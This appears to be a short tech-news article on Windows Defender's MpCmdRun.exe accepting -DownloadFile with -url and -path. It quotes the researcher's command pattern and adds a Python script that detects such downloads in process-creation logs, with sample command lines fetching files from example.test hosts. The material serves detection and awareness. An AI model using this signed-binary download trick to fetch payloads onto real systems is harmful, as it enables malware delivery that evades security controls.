Windows Defender, the basic malware protection on any modern Windows PC, also comes packed with another handy feature: a command-line interface. “MpCmdRun.exe” (Microsoft Protection CMD) exposes Defender's security features on the command line, letting users scan, trace, and tinker with a variety of commands. Now, in an update to Windows Defender, security researcher Askar Mohammad discovered that files can be downloaded with the -DownloadFile argument and a URL to accompany it.
You can use C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.9-0\MpCmdRun.exe -url
-path to download your file using Windows defender itself.
— Askar (@mohammadaskar2) September 2, 2020
This -DownloadFile functionality allows a local user to download a file. In theory, however, Windows Defender, and hopefully other anti-virus software packages, should detect malware and remove it. Either way, this is one more vulnerability that could be exploited, and people need to watch out for it.
Ultimately, it is rather interesting that something like this was discovered. One would think that a defender would not normally allow an attacker through the front gate. In any case, this is a healthy reminder to make sure your network ports are secure and unwanted downloads are blocked while upholding any "great responsibility."
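For defenders, the download behaviour described above shows up in process-creation telemetry. The following is an added example, not code from the original article or from Microsoft: it scans command lines for MpCmdRun.exe invoked with -DownloadFile and pulls out the -url and -path values for triage. The event layout, host names and example.test URLs are constructed assumptions.

```python
import re

# A token is either a double-quoted run or a run of non-whitespace characters.
TOKEN_RE = re.compile(r'"[^"]*"|\S+')

def parse_mpcmdrun_download(command_line):
    """Return {'url', 'path'} if MpCmdRun.exe is run with -DownloadFile, else None."""
    tokens = [t.strip('"') for t in TOKEN_RE.findall(command_line)]
    lowered = [t.lower() for t in tokens]
    # Match on the file name only: the platform\<version> directory changes
    # with every Defender update, and the path may be quoted or unquoted.
    exe_idx = next((i for i, t in enumerate(lowered)
                    if t.rsplit("\\", 1)[-1] == "mpcmdrun.exe"), None)
    if exe_idx is None:
        return None
    args = lowered[exe_idx + 1:]
    if "-downloadfile" not in args:
        return None

    def value_of(flag):
        # Value is the token following the flag, unless that token is another flag.
        if flag in args:
            i = exe_idx + 1 + args.index(flag) + 1
            if i < len(tokens) and not tokens[i].startswith("-"):
                return tokens[i]
        return None

    return {"url": value_of("-url"), "path": value_of("-path")}

def find_downloads(events):
    """Return (host, url, path) for every event that matches."""
    hits = []
    for ev in events:
        parsed = parse_mpcmdrun_download(ev["CommandLine"])
        if parsed:
            hits.append((ev["host"], parsed["url"], parsed["path"]))
    return hits

# Constructed sample events (hypothetical hosts and URLs), shaped like
# process-creation records that carry a CommandLine field.
SAMPLE_EVENTS = [
    {"host": "ws-01", "CommandLine": r'"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.9-0\MpCmdRun.exe" -DownloadFile -url https://example.test/tool.bin -path C:\Users\Public\tool.bin'},
    {"host": "ws-02", "CommandLine": r'C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.9-0\MpCmdRun.exe -downloadfile -URL https://example.test/a.dat -PATH "C:\Temp\a b.dat"'},
    {"host": "ws-03", "CommandLine": r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 1'},
    {"host": "ws-04", "CommandLine": r'C:\Windows\System32\notepad.exe C:\notes\MpCmdRun.exe-downloadfile.txt'},
]

if __name__ == "__main__":
    for host, url, path in find_downloads(SAMPLE_EVENTS):
        print(f"{host}: MpCmdRun.exe download {url} -> {path}")
```

Matching is by file name and argument, so a renamed copy of the binary would need a check on the file's original name or signature instead of the command line.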